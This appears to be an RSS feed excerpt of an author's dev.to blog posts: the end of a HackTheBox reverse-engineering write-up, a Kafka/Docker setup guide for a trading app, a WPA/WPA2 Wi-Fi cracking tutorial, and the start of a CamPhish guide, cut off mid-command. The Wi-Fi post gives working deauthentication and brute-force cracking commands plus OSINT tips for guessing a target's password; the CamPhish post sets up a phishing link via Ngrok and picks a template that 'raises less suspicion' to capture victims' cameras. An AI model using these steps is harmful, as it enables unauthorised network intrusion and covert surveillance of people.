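&lt;p&gt;This identity is easy to verify (or to recompute from scratch) in Python; since Python 3.8, &lt;code&gt;pow&lt;/code&gt; with an exponent of -1 returns the modular inverse directly:&lt;/p&gt;

```python
# check the identity used by the decryption script
assert (123 * 179) % 256 == 1

# Python 3.8+ computes the modular inverse directly
inv = pow(123, -1, 256)
print(inv)  # 179
```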

&lt;h4&gt;
  
  
  Let’s execute it …
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--zURQENAe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A3aDPUJtp7gvMElUzjXVp2w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--zURQENAe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A3aDPUJtp7gvMElUzjXVp2w.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Flag&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The task was not too challenging, and we successfully obtained the flag:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;HTB{l00k_47_y0u_r3v3rs1ng_3qu4710n5_c0ngr475}&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>cybersecurity</category>
      <category>hackthebox</category>
      <category>hacking</category>
      <category>reverseengineering</category>
    </item>
    <item>
      <title>Real-Time Trading App: Golang, Kafka, Websockets — Intro &amp; Setup (PART-1)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 13 Dec 2023 14:15:09 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-intro-setup-part-1-37fn</link>
      <guid>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-intro-setup-part-1-37fn</guid>
      <description>&lt;h3&gt;
  
  
  Real-Time Trading App: Golang, Kafka, Websockets — Intro &amp;amp; Setup (PART-1)
&lt;/h3&gt;

&lt;p&gt;High-performance real-time trading engine with Golang, Kafka, and Websockets…&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hiGd0fqn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/811/0%2ATliRagkNGkLsJXNu.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hiGd0fqn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/811/0%2ATliRagkNGkLsJXNu.jpg" alt="" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This blog will be structured into four parts:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Introduction &amp;amp; Setup&lt;/li&gt;
&lt;li&gt;&lt;a href="https://medium.com/@kkamalesh117/real-time-trading-app-golang-kafka-websockets-setting-up-kafka-in-golang-part-2-3b80e720c6ee"&gt;Golang Integration with Kafka&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Consumer Service &amp;amp; Websockets Implementation&lt;/li&gt;
&lt;li&gt;Frontend Development&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  System Design
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--sjEAcZ9Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/688/0%2AvGo8oYrIid85jOmM.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--sjEAcZ9Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/688/0%2AvGo8oYrIid85jOmM.jpg" alt="kafka architecture" width="688" height="368"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;This article serves as a comprehensive guide to building a real-time trading platform using Golang, Kafka, and Websockets. Let’s delve into the rationale behind our choice of components:&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;1. Golang:&lt;/strong&gt; Golang’s direct compilation to machine code and its simplicity make it an ideal choice for low-latency systems. While debates exist about language preferences, Golang stands out for its efficiency and effectiveness in getting the job done.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Kafka:&lt;/strong&gt; Despite the bidirectional capabilities of Websockets, we opt for Kafka for two key reasons. Firstly, Websockets solely facilitate data exchange without data storage capabilities. For timely financial data analysis, multiple services may be necessary. Secondly, Kafka’s distributed architecture aligns seamlessly with stock market platforms operating across various countries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Websockets:&lt;/strong&gt; The need for Websockets arises from Kafka’s default design for multi-host environments. In Kafka, a single partition can be consumed by only one consumer within a consumer group. This poses challenges when multiple tabs of the same app are open, as each tab would receive messages sequentially rather than simultaneously. Additionally, the scarcity of client-side Kafka libraries, especially for the web, makes Websockets the more practical choice across platforms.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Web App:&lt;/strong&gt; For the web application, we’ve chosen ReactJS to craft an intuitive and responsive user interface. Leveraging the power of React components and its virtual DOM, we aim to create a seamless and interactive trading experience. The real-time data received from Kafka via Websockets will be efficiently rendered using React components.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Setup&lt;/strong&gt;
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;Let’s kick off the implementation. We’ll utilize &lt;a href="https://github.com/binance/binance-spot-api-docs/blob/master/web-socket-streams.md"&gt;Binance’s open-source&lt;/a&gt; WebSocket connection to establish our data source. We’ll subscribe to the following tickers to receive real-time updates:&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;btcusdt,ethusdt,busdusdt,bnbusdt,ltcusdt,xrpusdt,maticusdt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now that we have decided on our data source, it’s time to set up Kafka.&lt;br&gt;&lt;br&gt;
I will be using Docker images from Bitnami.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;version: '3.8'
services:
  zookeeper:
    env_file:
    - ./.env
    image: bitnami/zookeeper
    expose:
    - "2181"
    ports:
    - "2181:2181"

  kafka:
    image: bitnami/kafka
    env_file:
    - ./.env
    depends_on:
    - zookeeper
    ports:
    - '9092:9092'
    environment:
      KAFKA_ADVERTISED_LISTENERS: INSIDE://kafka:9093,OUTSIDE://localhost:9092
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: INSIDE:PLAINTEXT,OUTSIDE:PLAINTEXT
      KAFKA_LISTENERS: INSIDE://0.0.0.0:9093,OUTSIDE://0.0.0.0:9092
      KAFKA_INTER_BROKER_LISTENER_NAME: INSIDE
      KAFKA_ZOOKEEPER_CONNECT: "zookeeper:2181"
      KAFKA_BROKER_ID: 1  
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;To commence, we’ll set up two essential services: Zookeeper and Kafka. For those unfamiliar with Zookeeper, it serves as a centralized cluster management system developed by Apache. Typically employed in distributed systems, Zookeeper plays a crucial role in addressing questions related to Kafka’s operation, including:&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ol&gt;
&lt;li&gt;Determining the broker responsible for handling the publish/subscribe functionality for a given topic and partition.&lt;/li&gt;
&lt;li&gt;Managing the count of nodes or server instances available in the cluster.&lt;/li&gt;
&lt;li&gt;Providing insights into available topics, data retention settings, and more.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;While this provides a brief overview, you can delve deeper into Zookeeper’s functionalities &lt;a href="https://zookeeper.apache.org"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The question may arise:&lt;/strong&gt;  &lt;strong&gt;why deploy Zookeeper when, for testing and development purposes, we don’t necessarily require multiple nodes?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;While Kafka can technically operate without Zookeeper, it’s essential to note that Apache does not recommend doing so in production environments. Hence, for consistency and best practices, we opt to incorporate Zookeeper from the outset, aligning with Apache’s guidelines for a robust and reliable setup.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here is the &lt;strong&gt;.env&lt;/strong&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;KAFKA_HOST=kafka
KAFKA_PORT=9092

#Zookeeper
ALLOW_ANONYMOUS_LOGIN=yes
ZOO_PORT_NUMBER=2181

#Kafka
KAFKA_CFG_ZOOKEEPER_CONNECT=zookeeper:2181
ALLOW_PLAINTEXT_LISTENER=yes
KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://kafka:9092

TICKERS="btcusdt,ethusdt,busdusdt,bnbusdt,ltcusdt,xrpusdt,maticusdt"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Proceed with the following command to initiate the setup:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo docker-compose up -d
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These steps should suffice for configuring Kafka and Zookeeper in your local environment.&lt;/p&gt;
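&lt;p&gt;Before moving on, it is worth confirming that the broker actually came up. One way is a Compose healthcheck on the Kafka service; the stanza below is a sketch and assumes the image ships kafka-topics.sh on its PATH (the script name and path vary between Kafka images):&lt;/p&gt;

```yaml
# Hypothetical healthcheck stanza for the kafka service in docker-compose.yml;
# adjust the script name/path to the Kafka image you actually use.
    healthcheck:
      test: ["CMD-SHELL", "kafka-topics.sh --bootstrap-server localhost:9092 --list"]
      interval: 10s
      timeout: 10s
      retries: 5
```

&lt;p&gt;With this in place, docker-compose ps reports the service as healthy once the broker answers on port 9092.&lt;/p&gt;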

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;We’ve successfully laid the foundation for our real-time trading application by setting up Kafka and Zookeeper in our local environment. Be on the lookout for the &lt;strong&gt;next part&lt;/strong&gt; of this series, where we’ll delve into the &lt;strong&gt;integration of Golang with Kafka.&lt;/strong&gt; Stay tuned for a deeper exploration of how these technologies synergize to create a robust and efficient real-time trading platform. &lt;strong&gt;Happy coding!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/Real-time-trade-app"&gt;GitHub - Kamalesh-Seervi/Real-time-trade-app: Kafka, WebSockets&lt;/a&gt;&lt;/p&gt;

</description>
      <category>go</category>
      <category>kafka</category>
      <category>cryptocurrency</category>
      <category>trading</category>
    </item>
    <item>
      <title>WPA-WPA2 Wi-Fi Hacking: A Step-by-Step Guide.</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Mon, 20 Nov 2023 17:58:11 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/wpa-wpa2-wi-fi-hacking-a-step-by-step-guide-2hcf</link>
      <guid>https://dev.to/kamaleshseervi/wpa-wpa2-wi-fi-hacking-a-step-by-step-guide-2hcf</guid>
      <description>&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; The content provided in this blog is intended for educational purposes only. The information shared here is meant to contribute to the understanding of cybersecurity and ethical hacking in a responsible and legal manner.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--yOO5sRve--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/750/1%2Aq1aUpUM8sHYD9nx98SIfIg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--yOO5sRve--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/750/1%2Aq1aUpUM8sHYD9nx98SIfIg.jpeg" alt="" width="750" height="422"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Aircrack-ng&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Introduction
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Wi-Fi security is a crucial aspect of digital privacy, and understanding how vulnerabilities can be exploited is essential for network administrators and cybersecurity enthusiasts. In this tutorial, we’ll explore the process of hacking WPA-WPA2-protected Wi-Fi networks for educational purposes using Aircrack-ng on Kali Linux.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Tools Required
&lt;/h3&gt;

&lt;p&gt;Before diving into the process, make sure you have the following tools:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network Adapter &lt;strong&gt;(e.g., TL-WN722N V2)&lt;/strong&gt; with monitoring mode support.&lt;/li&gt;
&lt;li&gt;Kali Linux installed on your machine.&lt;/li&gt;
&lt;li&gt;Aircrack-ng&lt;/li&gt;
&lt;li&gt;Airodump-ng&lt;/li&gt;
&lt;li&gt;Airmon-ng&lt;/li&gt;
&lt;li&gt;Crunch&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Monitoring Mode Setup
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Step 1: Kill Interrupting Services
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Before enabling monitoring mode, identify and kill services that might interrupt the process:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo airmon-ng check wlan0
sudo airmon-ng check kill
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NQnxrxU_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/886/0%2ApqzyS99v8xMdV_Ae.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NQnxrxU_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/886/0%2ApqzyS99v8xMdV_Ae.png" alt="" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Step 2: Enable Monitoring Mode
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Stop the WLAN interface and enable monitor mode:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Verify the mode using:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;iwconfig
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3Sgh3-Zo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2Ao3HsY17zjyMzBWXf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3Sgh3-Zo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2Ao3HsY17zjyMzBWXf.png" alt="" width="800" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Packet Capture and 4-way Handshake
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Step 3: Capture BSSID and Monitor Network
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Use airodump-ng to capture BSSID information:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UGLl43O8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2Al4noyKgiObJLJdoP.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UGLl43O8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2Al4noyKgiObJLJdoP.jpg" alt="" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Select a specific BSSID for monitoring and run:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng -c 1 -w Scan_network --bssid EW:WV:4H:J7:A5:28 wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Xo6utlTg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2AN7RrAanIiseynMGH.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Xo6utlTg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2AN7RrAanIiseynMGH.jpg" alt="" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Leave the above command running in the background.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Step 4: Deauthentication Process
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Deauthenticate the target Wi-Fi to capture the 4-way handshake:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo aireplay-ng -0 0 -a EW:WV:4H:J7:A5:28 wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--7YxQbnww--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfQcEwRQNgLxKXBWr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--7YxQbnww--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfQcEwRQNgLxKXBWr.png" alt="" width="800" height="531"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Keep the command running until the 4-way handshake appears in the airodump-ng capture you left running in the background.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Final Stage: Password Cracking with Crunch and Aircrack-ng
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;After capturing the 4-way handshake, the final step involves cracking the Wi-Fi password using Crunch and aircrack-ng. It's important to note that the success of this process heavily depends on various factors, including the complexity and length of the password.&lt;/li&gt;
&lt;/ul&gt;
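&lt;p&gt;Before launching a crack, it helps to know how many candidates the chosen charset and length produce. Here is a quick shell sketch of the keyspace for an 8-character password over the 9-symbol charset 123456780, the same parameters as the crunch command in the next step:&lt;/p&gt;

```shell
#!/bin/sh
# Keyspace = (number of symbols) ^ (password length)
charset="123456780"
length=8

size=${#charset}          # 9 symbols in the charset
keyspace=1
i=0
while [ "$i" -lt "$length" ]; do
    keyspace=$((keyspace * size))
    i=$((i + 1))
done

echo "candidates to try: $keyspace"   # 9^8 = 43046721
```

&lt;p&gt;Roughly 43 million candidates is typically within reach of aircrack-ng on ordinary hardware within hours, which is why narrowing the charset matters so much.&lt;/p&gt;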

&lt;h4&gt;
  
  
  Using Crunch for Password Generation
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;In this example, I used Crunch to generate possible passwords. Since I knew the Wi-Fi password consisted of only numeric characters, the command was tailored accordingly:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo crunch 8 8 123456780 | aircrack-ng -w - Scan_network-01.cap -e KamaleshD
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ge_KzAM8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A9GmyQq6dznyCIe2R.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ge_KzAM8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A9GmyQq6dznyCIe2R.jpg" alt="" width="800" height="542"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Note:
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;Modify the crunch command based on your knowledge of the password, such as adjusting the length or character set.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Password Length and OSINT
&lt;/h3&gt;

&lt;p&gt;If you don’t know the password, attempting to crack it by testing all possible combinations is an extremely time-consuming process. The number of possibilities can be in the billions, making it practically impossible to crack on a standard PC within a reasonable timeframe.&lt;/p&gt;

&lt;p&gt;In such cases, consider leveraging Open Source Intelligence (OSINT) techniques. Analyze social footprints, gather information about the target’s preferences, and try to determine the likely length and complexity of the password. This approach can significantly reduce the search space and increase the chances of successful password guessing.&lt;/p&gt;
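&lt;p&gt;The scale problem is easy to put numbers on. The sketch below assumes a hypothetical rate of 100,000 keys per second and an 8-character password drawn from lowercase letters and digits (36 symbols); both figures are illustrative, not benchmarks:&lt;/p&gt;

```shell
#!/bin/bash
# Rough worst-case brute-force estimate (illustrative figures only)
symbols=36        # lowercase letters + digits
length=8
rate=100000       # hypothetical keys/second

combos=$((symbols ** length))    # 36^8 = 2,821,109,907,456
seconds=$((combos / rate))
days=$((seconds / 86400))

echo "combinations: $combos"
echo "worst case:   about $days days at $rate keys/sec"
```

&lt;p&gt;Narrow the search space with OSINT, say to digits only at a known length, and the same arithmetic drops from months to minutes.&lt;/p&gt;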

&lt;p&gt;Remember, ethical hacking involves responsible and legal use of knowledge. Always respect privacy and adhere to ethical standards when engaging in cybersecurity activities.&lt;/p&gt;

&lt;h3&gt;
  
  
  Conclusion
&lt;/h3&gt;

&lt;p&gt;Ethical hacking involves understanding vulnerabilities to enhance security measures. This guide aims to provide insights into Wi-Fi security, emphasizing responsible and legal use of knowledge. Always respect privacy and adhere to ethical standards when exploring cybersecurity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/WPA-WPA2-wifi-hacking"&gt;GitHub - Kamalesh-Seervi/WPA-WPA2-wifi-hacking: Aircrack-ng&lt;/a&gt;&lt;/p&gt;

</description>
      <category>hacking</category>
      <category>ethicalhacking</category>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>CamPhish: Understanding and Safeguarding Your Privacy</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 15 Nov 2023 15:46:13 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/camphish-understanding-and-safeguarding-your-privacy-2fip</link>
      <guid>https://dev.to/kamaleshseervi/camphish-understanding-and-safeguarding-your-privacy-2fip</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; Do not use this technique to hack anyone unless you have permission.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bYCiRJ6Y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AShHgRIYC3P9gnwrERd7tPQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bYCiRJ6Y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AShHgRIYC3P9gnwrERd7tPQ.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To begin, acquire the CamPhish tool from its GitHub page via the provided &lt;a href="https://github.com/techchipnet/CamPhish"&gt;&lt;strong&gt;link&lt;/strong&gt;&lt;/a&gt;. Alternatively, you can obtain it by entering the following command into your terminal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git clone https://github.com/techchipnet/CamPhish
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After installing the tool, run it and you should see the following options:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--txiRlKSN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AhNUoD1ZKlOW6cbkyhLcM6Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--txiRlKSN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AhNUoD1ZKlOW6cbkyhLcM6Q.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;[01] Ngrok&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;You can proceed with any option, but I suggest opting for option 1, which uses Ngrok, the tool that will expose your local server to the Internet in this process.&lt;/p&gt;

&lt;p&gt;Despite how it may sound, Ngrok does nothing sinister: it simply tunnels a server on your local machine out to a public Internet URL. Visit the official Ngrok website, create an account, and obtain your authentication token; save it for later. Next, when prompted to choose a template, I suggest option 2, the Live YouTube TV link, as it tends to raise less suspicion. Simply choose 2 and press ENTER to proceed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--r5l3jRy6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AjGOkIlsO5XqNZ_j8Nfs8_Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--r5l3jRy6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AjGOkIlsO5XqNZ_j8Nfs8_Q.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;[02] Live Youtube TV&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Once you opt for the Live YouTube TV option, the system will prompt you to provide a watch ID, which you can obtain directly from YouTube. Here’s a demonstration: pick any video on youtube.com; for instance, I’ll choose the song “What is Love.” Check the URL, and you’ll find the watch ID. Refer to the screenshot below for clarification:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Original URL:&lt;/strong&gt; &lt;a href="https://www.youtube.com/watch?v=UyQm4O9G7OM&amp;amp;list="&gt;https://www.youtube.com/watch?v=UyQm4O9G7OM&amp;amp;list=&lt;/a&gt; &lt;strong&gt;Extracted ID:&lt;/strong&gt; UyQm4O9G7OM&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1W-9kP3---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ATHMIAXRa5_RLTrBuaF5x1Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1W-9kP3---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ATHMIAXRa5_RLTrBuaF5x1Q.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;watch ID [YouTube]&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The watch ID is the text following watch?v= in the URL. Copy this ID and paste it into the terminal when the program prompts for it.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
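&lt;p&gt;The same extraction can be done in the terminal with plain POSIX parameter expansion; a small sketch using the example URL above:&lt;/p&gt;

```shell
#!/bin/sh
# Strip everything up to and including "watch?v=", then drop trailing parameters.
# Note: in the first expansion the ? acts as a single-character wildcard, which
# here happens to match the literal ? in the URL.
url="https://www.youtube.com/watch?v=UyQm4O9G7OM&list="

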